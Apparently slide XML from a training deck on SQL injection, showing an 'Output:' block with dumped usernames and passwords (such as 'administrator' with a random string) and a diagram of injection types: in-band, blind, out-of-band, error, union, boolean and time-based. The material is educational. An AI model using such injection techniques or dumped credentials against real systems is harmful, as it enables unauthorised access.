                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>users--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8656" y="7252419"/>
            <a:ext cx="1623695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-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Output:</a:t>
            </a:r>
            <a:endParaRPr sz="3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1576" y="8250680"/>
            <a:ext cx="16341090" cy="185293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16510" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120" marR="11849100">
              <a:lnSpc>
                <a:spcPct val="101299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>carlos  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>afibh9cjnkuwcsfobs7h  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>administrator  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tn8f921skp5dzoy7hxpk</a:t>
            </a:r>
            <a:endParaRPr sz="2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990536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9"/>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-305"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-275"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1115"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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800600" y="2959312"/>
            <a:ext cx="3268979" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3268979" h="948689">
                <a:moveTo>
                  <a:pt x="0" y="158078"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="158078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158078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13761" y="3050662"/>
            <a:ext cx="304101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670">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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04356" y="3858260"/>
            <a:ext cx="9062085" cy="3157855"/>
            <a:chOff x="1404356" y="3858260"/>
            <a:chExt cx="9062085" cy="3157855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434928" y="3889693"/>
              <a:ext cx="0" cy="1099185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="1099185">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1098569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74961" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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35788" y="6035784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4260823" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260823" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426082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35788" y="6035784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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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753015" y="6126589"/>
            <a:ext cx="378396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165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In-band</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Classic)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43526" y="4978383"/>
            <a:ext cx="8900795" cy="2047875"/>
            <a:chOff x="3543526" y="4978383"/>
            <a:chExt cx="8900795" cy="2047875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3574959" y="500981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60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434928" y="500981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60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993871" y="6046371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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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194589" y="6136641"/>
            <a:ext cx="4018279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90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Inferential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Blind)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03466" y="4978383"/>
            <a:ext cx="8900795" cy="2072639"/>
            <a:chOff x="10403466" y="4978383"/>
            <a:chExt cx="8900795" cy="2072639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434899" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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853788" y="6070872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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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641482" y="6161771"/>
            <a:ext cx="284416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190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Out-of-Band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0916" y="4978383"/>
            <a:ext cx="16825595" cy="4960620"/>
            <a:chOff x="500916" y="4978383"/>
            <a:chExt cx="16825595" cy="4960620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17294866" y="500981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60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74959" y="6984237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59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434928" y="701488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59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32349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2954811" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158077" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158077" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048171" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082390" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104831" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112890" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112890" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104831" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082390" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048171" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811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32349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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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496898" y="9049222"/>
            <a:ext cx="118237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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or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096577" y="8927237"/>
            <a:ext cx="3176270" cy="1011555"/>
            <a:chOff x="4096577" y="8927237"/>
            <a:chExt cx="3176270" cy="1011555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4128010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2954810" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954810" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048170" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082389" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104830" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112889" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112889" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104830" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082389" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048170" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954810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28010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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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979367" y="9049222"/>
            <a:ext cx="141097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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="4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993871" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113404" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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595896" y="9049222"/>
            <a:ext cx="190944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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean</a:t>
            </a:r>
            <a:endParaRPr sz="44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651163" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113405" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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2625554" y="9049222"/>
            <a:ext cx="116459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60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e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675006" y="7978793"/>
            <a:ext cx="11245850" cy="981075"/>
            <a:chOff x="1675006" y="7978793"/>
            <a:chExt cx="11245850" cy="981075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="object 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1706408" y="8010206"/>
              <a:ext cx="1868805" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1868804" h="0">
                  <a:moveTo>
                    <a:pt x="1868551" y="0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706419" y="8010206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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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427300" y="8011201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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="7999044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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="8025964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90" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="884608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434928" y="8025964"/>
              <a:ext cx="2454910" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
